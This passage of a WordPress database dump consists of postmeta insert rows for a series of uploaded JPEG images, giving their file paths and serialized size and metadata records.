(5512,1970,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_24.jpg'),
(5513,1970,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_24.jpg\";s:8:\"filesize\";i:420750;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_24-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17195;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_24-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132611;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8251;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_24-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83111;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_24-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:248058;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_24-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20876;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5514,1971,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_22.jpg'),
(5515,1972,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_21.jpg'),
(5516,1971,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_22.jpg\";s:8:\"filesize\";i:397246;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_22-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15596;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_22-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120654;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8257;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_22-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74573;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_22-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:230385;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_22-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18885;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5517,1972,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_21.jpg\";s:8:\"filesize\";i:403147;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_21-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15967;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_21-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122969;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8465;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_21-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76069;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_21-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:233806;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_21-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5518,1973,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_20.jpg'),
(5519,1973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_20.jpg\";s:8:\"filesize\";i:397452;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_20-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15336;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_20-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119587;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7755;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_20-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73717;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_20-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:228647;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_20-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18625;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5520,1974,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_19.jpg'),
(5521,1974,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_19.jpg\";s:8:\"filesize\";i:377666;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_19-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15781;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_19-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119503;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7973;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_19-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74772;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_19-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:223257;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_19-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19460;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5522,1975,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_18.jpg'),
(5523,1975,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_18.jpg\";s:8:\"filesize\";i:379917;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_18-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15684;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_18-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118611;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7893;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_18-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:73818;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_18-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:222886;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_18-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19213;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5524,1976,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_17.jpg'),
(5525,1976,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_17.jpg\";s:8:\"filesize\";i:379248;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_17-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14875;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_17-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:116318;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7855;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_17-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71865;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_17-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219736;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_17-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18475;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5526,1977,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_16.jpg'),
(5527,1978,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_15.jpg'),
(5528,1977,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_16.jpg\";s:8:\"filesize\";i:374083;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14040;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_16-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110113;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7535;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_16-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67759;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_16-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:211856;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_16-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16751;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5529,1978,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_15.jpg\";s:8:\"filesize\";i:357812;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17847;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_15-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122144;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8650;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_15-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78997;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_15-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:219657;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_15-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21437;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5530,1979,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_14.jpg'),
(5531,1979,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_14.jpg\";s:8:\"filesize\";i:390705;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17710;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_14-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122615;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8578;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_14-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78249;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_14-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:227216;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_14-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21577;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5532,1980,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_13.jpg'),
(5533,1980,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_13.jpg\";s:8:\"filesize\";i:430147;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19126;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_13-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132811;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9585;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_13-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83921;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_13-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:247271;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_13-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22883;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5534,1981,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_12.jpg'),
(5535,1981,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:38:\"2025/08/LINE_ALBUM_12868_250813_12.jpg\";s:8:\"filesize\";i:369734;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16099;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_12-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111124;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7348;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_12-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70063;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"LINE_ALBUM_12868_250813_12-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:208923;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:38:\"LINE_ALBUM_12868_250813_12-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5536,1983,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_9.jpg'),
(5537,1982,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_11.jpg'),
(5538,1984,'_wp_attached_file','2025/08/LINE_ALBUM_12868_250813_10.jpg'),
